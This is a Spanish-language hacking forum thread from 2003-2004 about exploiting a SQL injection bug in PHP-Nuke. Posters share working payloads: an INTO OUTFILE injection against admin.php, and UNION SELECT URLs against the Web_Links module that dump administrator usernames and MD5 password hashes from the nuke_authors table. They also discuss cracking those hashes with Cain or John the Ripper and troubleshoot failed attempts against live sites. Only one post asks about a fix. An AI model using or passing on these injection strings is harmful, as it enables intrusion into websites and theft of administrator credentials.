exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....

Kriptosys · 31 Octubre 2003, 14:42 PM

MD5 no se puede descifrar..... pero como dice Blade se puede crackear.
que no es mas que una Comparacion de Caracteres, es decir Toma un Caracter lo cifra y lo compara con el del Texto cifrado... y asi hasta que de con los caracteres correctos.

FiH nº 3 En camino!!!

elvizo · 1 Noviembre 2003, 03:02 AM

bueno y q aplicacion se encarga de hacer dicah operacion? john lo hace? no se si oi algo o me estoy confundiendo

na8us · 12 Noviembre 2003, 16:32 PM

Aca solo hemos visto la manera de explotar el bug me gustaria saber cual es la manera de solucionar el problema $:-\$

Salu2

elvizo · 13 Noviembre 2003, 09:47 AM

md5 se crackea con cain

JaNi · 26 Diciembre 2003, 15:35 PM

Citar/admin.php?op=login&pwd=123&aid=Admin'%20INTO%20OUTFILE%20'/path_to_file/pwd.txt<=- Esto es para Unicamente el spaiz-nuke...
Que despues se visualiza en: /path_to_file/pwd.txt...

Eso no funciona en la mayoría de servidores

como hacer para sacar el password en md5 de otra forma?

[Ky3zZ] · 10 Febrero 2004, 03:50 AM

Realmente funciona
Para el PHP-Nuke y el Modulo WebLinks:

Para que muestre todos los administradores:
/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20

Y para que muestre los Password Codificados de los administradores:
/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20pwd,%20aid%20FROM%20nuke_authors%20

Pero tengo una duda como puedo crackear con el Cain el PWL? es que no lo entiendo.. por mas que traduzco manuales del cain al español no se como crackear el pasword si alguien sabe algo... que me mande un e-mail: juan_lux@hotmail.com

[Ky3zZ] · 16 Febrero 2004, 09:20 AM

Weinas...oyes yo me preguntaba por casualidad... habria forma de saltarse la proteccion esa?
Es que no me acorde de guardar el Pass en MD5 y ahora an puesto la proteccion en la web donde lo hice y no se... amos que yo me preguntaba eso que si habia alguna manera de poder saber de nuevo el pass saltandose la proteccion..? ??? ??? ???

CamelSmoke · 20 Febrero 2004, 19:28 PM

En realidad el Password MD5 no se saca de ninguna de esas maneras...bah, tal vez con el spaniz nuke, pero PHP-Nuke no muestra los pass MD5, al menos aun no encontre la forma de verlo ni cifrado ni nada, lo cual me gustaria ya que quiero asegurar mi sitio en PHP-Nuke.

p47ch · 4 Marzo 2004, 23:54 PM

Disculpar mi ignorancia, pero como se que versión de nuke esta utilizando dicha pagina?

Pues algunas no lo dicen !

Gracias !

Ademas me sale lo sig:

Warning: Supplied argument is not a valid MySQL result resource in /var/www/html/includes/sql_layer.php on line 238

Warning: Supplied argument is not a valid MySQL result resource in /var/www/html/includes/sql_layer.php on line 286

y

Warning: Supplied argument is not a valid MySQL result resource in /var/www/html/includes/sql_layer.php on line 286

Warning: Supplied argument is not a valid MySQL result resource in /var/www/html/includes/sql_layer.php on line 286

Cuando pongo

http://www.el-dominio.com/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20

Por q ?

[Ky3zZ] · 5 Marzo 2004, 01:57 AM

Eso es muy facil, te salen los errores de la base de datos.. porque? pues por que la web donde as realizado el bug no tiene activado el modulo de Web_Links o simplemente a borrado ese modulo como preteccion.
Lo que sacamos encuenta.. que no se puede hacer en esa web.

exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....

p47ch